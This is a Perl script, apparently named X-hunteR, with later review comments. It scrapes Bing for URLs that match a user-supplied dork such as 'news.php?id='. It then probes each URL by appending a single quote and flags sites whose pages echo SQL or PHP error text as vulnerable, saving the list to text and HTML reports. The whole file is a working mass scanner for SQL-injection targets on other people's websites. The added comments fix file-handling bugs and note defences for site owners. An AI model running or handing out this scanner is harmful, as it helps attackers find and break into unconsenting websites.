#!/usr/bin/perl
#sc0rp@hushmail.com
use LWP::UserAgent;
use HTTP::Request;
use Term::ANSIColor;
# Shared HTTP client for the later probe phase. No agent string is set, so
# requests made through $ua carry LWP's default "libwww-perl/<version>"
# User-Agent, and each request gives up after 7 seconds.
my $ua = LWP::UserAgent->new(timeout => 7);

# Clear the terminal through the external `clear` command before drawing.
system("clear");

# Start-up banner, kept as a single-quoted literal so backslashes stay literal.
my $banner = q{
____  ___         .__                  __        __________ 
\   \/  /         |  |__  __ __  _____/  |_  ____\______   \
 \     /   ______ |  |  \|  |  \/    \   __\/ __ \|       _/
 /     \  /_____/ |   Y  \  |  /   |  \  | \  ___/|    |   \
/___/\  \         |___|  /____/|___|  /__|  \___  >____|_  /
      \_/              \/           \/          \/       \/ 

};
print color("yellow"), $banner, color("reset");



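# Empty the two working files left over from a previous run:
#   search-dump.txt.clear - copy kept by the later in-place de-duplication
#   search-dump.txt       - raw search results
# Three-argument open keeps the mode separate from the path, and a failure is
# reported here instead of surfacing later as silently missing output.
for my $stale_path ('search-dump.txt.clear', 'search-dump.txt') {
    open(my $reset_fh, '>', $stale_path)
        or die "Cannot reset $stale_path: $!";
    close($reset_fh)
        or die "Cannot close $stale_path: $!";
}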

# First prompt: the search query. The value is read from STDIN as typed and
# stored in the package variable $dork with its trailing newline removed.
print color("red"), "type in a dork", color("reset"),
    " ex:(news.php?id=), ex:(site:pt noticias.php?id=)\n";
print color("red"), ">>>\n", color("reset");
chomp($dork = <STDIN>);

# Second prompt: base name of the result files. $file is operator-controlled
# input that later becomes part of the paths "$file" and "$file.html".
print color("green"), "file to save de vulnerable sites", color("reset"),
    " ex:(vul.txt)\n";
print color("red"), ">>>\n", color("reset");
chomp($file = <STDIN>);
     
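# Truncate the text and HTML result files named by the operator, so a reused
# name starts empty. $file comes straight from STDIN: with the two-argument
# form open(H, ">$file") Perl parses mode characters out of the combined
# string (a leading ">" turns it into append, "&NAME" into a handle dup).
# The three-argument form treats the value purely as a path. An empty or
# unwritable name now stops the run here rather than after the scan.
for my $report_path ($file, "$file.html") {
    open(my $report_fh, '>', $report_path)
        or die "Cannot reset $report_path: $!";
    close($report_fh)
        or die "Cannot close $report_path: $!";
}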


# Search phase: page through Bing results for $dork and append the target of
# every '<h3><a href="' link found in each page to search-dump.txt.
print color("green"),"Search initialized",color("reset")," stand by\n";

# $i is the result offset sent as the "first" parameter; it advances by 10 per
# page and is capped below 10000.
for ($i = 0; $i < 10000; $i += 10) {
     # A new client is built for every page with a fixed, hard-coded
     # User-Agent string and a 10 second timeout.
     $useragent = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
     $useragent->timeout(10);
     # env_proxy makes the client take proxy settings from the environment.
     $useragent->env_proxy;
     # $dork is concatenated into the query string exactly as it was typed.
     $curl = $useragent->get('http://www.bing.com/search?q=' .$dork.   '&first=' . $i . '&FORM=PERE')->content;
     # Looked up before $curl is consumed below; when 'sb_pagN' is absent the
     # outer loop stops after this page (presumably the pager marker - confirm).
     $check = index($curl, 'sb_pagN');

# Walk the page body, cutting it down after each match until none remain.
while (1) {
	$n = index($curl, '<h3><a href="');
  
if ($n == -1) {
last;
}

# 13 is the length of '<h3><a href="', so $curl now starts at the link target.
$curl = substr($curl, $n + 13);
  # NOTE(review): index() returns -1 when no closing quote follows; substr then
  # gets a negative length and returns everything but the last character.
  $s = substr($curl, 0, index($curl, '"'));
  
# $s is remote page content; it is echoed and stored verbatim.
print color("green"), "[+] ",color("reset"),"$s\n";
# NOTE(review): two-argument open, return value unchecked; a failed open
# silently drops the result.
open(dork,">>search-dump.txt");
print dork $s, "\n";
close(dork);
}

if ($check == -1) {
last;
}
} 
   print "\n";
   print color("Red"),"[INFO] ",color("reset"),"Search Done\n";
   print "\n";
   print color("Red"),"[INFO] ",color("reset"),"Removing Duplicated Lines from dump search\n";
   sleep 2;

# De-duplicate search-dump.txt using Perl's in-place edit mode. With $^I set
# to '.clear', the untouched original (duplicates included) is kept as
# search-dump.txt.clear and the filtered lines replace search-dump.txt.
my $cleanrthefile = 'search-dump.txt';
my %seen;
{
    # Both settings are localized so in-place mode ends with this block.
    local $^I   = '.clear';
    local @ARGV = ($cleanrthefile);
    while (my $entry = <>) {
        # Only the first occurrence of a line is written back.
        print $entry unless $seen{$entry}++;
    }
}

# Prefix shared by the status lines below.
my @info_tag = (color("Red"), "[INFO] ", color("reset"));

print @info_tag, "finished processing file.\n";
sleep 2;
print "\n";

print @info_tag, "Opening search dump to search for", color("red"), " vul's\n", color("reset");
print "\n";

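# Report how many de-duplicated lines search-dump.txt holds.
# A lexical handle is used and closed right away; the original left the
# bareword FILE handle open for the rest of the run.
open(my $count_fh, '<', 'search-dump.txt') or die $!;
my @amount1 = <$count_fh>;
close($count_fh);

# An array in scalar context yields its element count.
my $amount1 = @amount1;
my $infomsg = "$amount1 uris to test";

# $infomsg already ends in "uris to test"; the original appended the phrase a
# second time, printing "N uris to test uris to test".
print color("red"), "[INFO]", color("reset"), " $infomsg\n";
print "\n";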

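# Probe phase. Each line of search-dump.txt gets a single quote appended and
# is fetched once through $ua. The response body is then matched against a
# fixed list of error-text patterns, and URLs that match are appended to
# "$file" and "$file.html".
#
# The verdicts are substring heuristics only: /SQL/ matches any page that
# contains those three letters, so a hit is not proof of a flaw.
#
# For site owners: these requests end in a trailing "'" and carry LWP's
# default libwww-perl User-Agent. The script keys on database or PHP error
# text echoed in the body, so generic error pages remove that signal, while
# parameterized queries address the underlying flaw.
$LOGFILE = "search-dump.txt";
open(my $log_fh, '<', $LOGFILE) or die("Could not open log file.");

# Minimal HTML escaping for text and attribute values. URLs in the dump come
# from remote pages and were previously written into the report unescaped, so
# a crafted link could inject markup into the HTML file the operator opens.
my $escape_html = sub {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    $text =~ s/'/&#39;/g;
    return $text;
};

# Append one flagged URL to both result files. Three-argument open keeps the
# operator-supplied $file from being parsed for mode characters, and every
# open and close is checked.
my $record_hit = sub {
    my ($hit_url) = @_;

    open(my $txt_fh, '>>', $file) or die "Cannot append to $file: $!";
    print {$txt_fh} $hit_url, "\n";
    close($txt_fh) or die "Cannot close $file: $!";

    open(my $html_fh, '>>', "$file.html") or die $!;
    my $shown = $escape_html->($hit_url);
    if ( $hit_url =~ m{\Ahttps?://}i ) {
        print {$html_fh} "<a href=\"$shown\">$shown</a>\n";
    }
    else {
        # Anything that is not http(s) is listed as plain text so the report
        # never contains a clickable javascript: or data: link.
        print {$html_fh} "$shown\n";
    }
    close($html_fh) or die "Cannot close $file.html: $!";
};

foreach $line (<$log_fh>) {
    chomp($line);
    my $url = $line . "'";

    my $request  = HTTP::Request->new( GET => $url );
    my $response = $ua->request($request);

    # Fetch the body once; every pattern below is tested against this copy.
    my $body = $response->content;

    if ( $body =~ /SQL/ || $body =~ /\/var\/www\// ) {
        $record_hit->($url);
        print color("bold red"), "[+] ", color("reset"), "$url", color("bold red"), " is vul", color("reset");
    }
    elsif ( $body =~ m/80040e14/i ) {
        $record_hit->($url);
        print color("bold yellow"), "[+] ", color("reset"), "$url", color("bold yellow"), " MS DB error detected", color("bold red"), " SQLI possible", color("reset");
    }
    elsif ( $body =~ m/SELECT (.*) FROM (.*) WHERE/i ) {
        $record_hit->($url);
        print color("bold red"), "[+] ", color("reset"), "$url", color("bold red"), " SELECT FROM WHERE detected", color("reset");
    }
    elsif ( $body =~ m/SELECT (.*) FROM (.*)/i ) {
        # NOTE(review): the label is the same as in the branch above although
        # this pattern has no WHERE; the message text is left unchanged.
        $record_hit->($url);
        print color("bold red"), "[+] ", color("reset"), "$url", color("bold red"), " SELECT FROM WHERE detected", color("reset");
    }
    elsif ( $body =~ m/(.*) Invalid argument supplied (.*)/i ) {
        $record_hit->($url);
        print color("bold red "), "[+] ", color("reset"), "$url", color("bold red"), " Invalid argument supplied Detected", color("reset");
    }
    else {
        print color("green"), "[-] ", color("reset"), "$url", color("green"), " not vulnerable", color("reset");
    }

    print "\n";
}
close($log_fh);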

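# Final summary: list every URL written to "$file" and print the total.
print color("green"),"Vulnerability search done\n",color("reset");
print color("red"),"going to dump only vulnerable sites\n",color("reset");
print "\n";
sleep 2;

# $file is operator input. The original re-read it with a two-argument
# open(CHECKBOOK, "$file"), where a name ending in "|" is run as a command and
# a leading ">" truncates the file. The file is now read once through a
# three-argument open and the lines are reused for both the list and the count.
open(my $hits_fh, '<', $file) or die $!;
my @amount = <$hits_fh>;
close($hits_fh);

# An array in scalar context yields its element count.
my $amount = @amount;

# Each stored line still ends in its newline, so none is added here.
foreach $record (@amount) {
    print color("red"), "[+] ",color("reset"),"URL seems to be ",color("red"),"--> vul ",color("reset"),"$record",color("reset");
}

print "\n";
print color("red"), "[+] $amount URLS ",color("reset"),"that seem to be vul \n";
print color("red"), "[+] ",color("reset"),"vulnerable sites stored in",color ("red")," $file.html \n",color("reset");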
